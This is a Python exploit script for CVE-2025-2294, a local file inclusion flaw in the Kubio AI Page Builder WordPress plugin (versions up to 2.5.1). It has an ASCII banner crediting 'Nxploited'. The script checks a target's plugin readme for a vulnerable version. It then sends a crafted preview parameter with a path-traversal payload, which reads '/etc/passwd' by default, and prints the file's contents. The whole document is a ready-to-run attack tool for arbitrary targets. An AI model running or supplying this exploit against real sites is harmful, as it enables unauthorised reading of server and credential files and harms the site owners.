import requests import argparse import time session = requests.Session() requests.packages.urllib3.disable_warnings() session.verify = False banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@! @@@ @@!@! !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@! @!@ !@!!@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ !!@!!@!! @!! @!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!@!!! !!! !@! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! !!! :!!:!:!!: :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! !:::!!::: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::::: :: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: : : : ::: By: Nxploited | Khaled Alenazi """ def fetch_readme(url): target = f"{url}/wp-content/plugins/kubio/readme.txt" try: response = session.get(target, timeout=10) response.raise_for_status() return response.text except requests.HTTPError as http_err: print(f"[-] HTTP error occurred: {http_err}") except requests.RequestException as req_err: print(f"[-] Request error occurred: {req_err}") return None def is_vulnerable(readme_content): for line in readme_content.splitlines(): if "Stable tag:" in line: version = line.split(":")[-1].strip() parts = version.split(".") if len(parts) == 3: major, minor, patch = map(int, parts) if (major, minor, patch) <= (2, 5, 1): print("[+] Target is vulnerable. Exploiting...") time.sleep(3) return True break return False def build_exploit_url(url, target_file): return f"{url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={target_file}" def send_exploit_request(full_url): try: response = session.get(full_url, timeout=10) response.raise_for_status() return response.text except requests.HTTPError as http_err: print(f"[-] HTTP error occurred: {http_err}") except requests.RequestException as req_err: print(f"[-] Request error occurred: {req_err}") return None def display_result(content): if content: print("[+] Exploit successful. File content:") print(content) else: print("[-] Exploit failed or file not readable.") def exploit(target_url, file_to_read): readme = fetch_readme(target_url) if readme and is_vulnerable(readme): exploit_url = build_exploit_url(target_url, file_to_read) result = send_exploit_request(exploit_url) display_result(result) else: print("[-] Target is not vulnerable or readme.txt not accessible.") if __name__ == "__main__": print(banner) parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi") parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., https://example.com)") parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd", help="File to read (default: /etc/passwd)") args = parser.parse_args() exploit(args.url.rstrip("/"), args.file)